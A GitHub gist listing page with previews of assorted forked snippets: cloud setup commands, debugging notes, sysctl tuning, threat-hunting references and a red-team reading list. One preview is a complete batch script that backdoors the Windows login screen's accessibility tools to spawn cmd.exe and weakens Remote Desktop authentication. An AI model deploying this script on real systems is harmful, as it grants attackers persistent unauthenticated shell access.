Skip to content

Instantly share code, notes, and snippets.

View tuantmb's full-sized avatar
😹

Tuan T tuantmb

😹
  • Vietnam
View GitHub Profile

Task 1: Create a project jumphost instance

#Navigation menu > Compute engine > VM Instance
gcloud config set compute/zone us-east1-b
gcloud config set compute/region us-east1

gcloud compute instances create nucleus-jumphost \
	--machine-type f1-micro
@tuantmb
tuantmb / DebugWithWindbg.md
Last active April 6, 2024 13:54 — forked from reinaldocoelho/DebugWithWindbg.md
Debug on Windows using WinDbg
@tuantmb
tuantmb / auto-next.js
Created March 5, 2021 07:26 — forked from Esirei/auto-next.js
Pluralsight AutoNext Module
let autoNext = () => {
const modal = document.getElementsByClassName('player-modal is-active');
if (modal.length > 0) {
// const buttons = document.querySelectorAll('[data-css-176v989]');
const buttons = document.getElementsByClassName('u-full-width');
console.log('checking...', buttons.length);
for (let i = 0; i < buttons.length; i++) {
const button = buttons[i];
console.log(button.textContent);
@tuantmb
tuantmb / decompress.ps1
Created February 23, 2021 08:14 — forked from vortexau/decompress.ps1
Powershell to decompress DEFLATE data
$base64data = "insert compressed and base64 data here"
$data = [System.Convert]::FromBase64String($base64data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
while ($line = $sr.ReadLine()) {
@tuantmb
tuantmb / sticky_keys_persitence.bat
Created December 31, 2020 01:29 — forked from ahhh/sticky_keys_persitence.bat
Batch script to launch a cmd backdoor when stickykeys, utiliman, or display keyboard hotkeys are toggled. Also starts RDP.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
netsh firewall set service type = remotedesktop mode = enable
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
net start TermService
@tuantmb
tuantmb / ATP_advanced_hunting_references.txt
Created December 10, 2020 08:41 — forked from seamustuohy/ATP_advanced_hunting_references.txt
Reference Query Document for Windows Defender ATP Advanced hunting tool
# ADVANCED HUNTING REFERENCES
# Kusto Queries
# - Query Language REFERENCE
# - https://docs.microsoft.com/en-us/azure/data-explorer/kusto/query/
# - Regular Expression in Kusto
# - https://docs.microsoft.com/en-us/azure/data-explorer/kusto/query/re2
# - Allowed Regular Expression Syntax for Kusto Queries
# - https://github.com/google/re2/wiki/Syntax
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
@tuantmb
tuantmb / sysctl.conf
Created November 20, 2020 08:29 — forked from voluntas/sysctl.conf
Sysctl configuration for high performance
### KERNEL TUNING ###
# Increase size of file handles and inode cache
fs.file-max = 2097152
# Do less swapping
vm.swappiness = 10
vm.dirty_ratio = 60
vm.dirty_background_ratio = 2
@tuantmb
tuantmb / pickle_exploit_generator.py
Created November 11, 2020 11:07 — forked from 0xBADCA7/pickle_exploit_generator.py
Python cPickle/pickle exploit generator
#!/usr/bin/env python
'''
0xBADCA7
Vodka goes down the throat better with pickle.
This script generates pickled object representation. Good for CTFs.
Params: [1] function, [2] parameter, [3] pickle type
Sample run:
@tuantmb
tuantmb / github-troll.md
Created November 6, 2020 04:23 — forked from lrvick/github-troll.md
Trolling Github's DMCA repo with their own security flaws.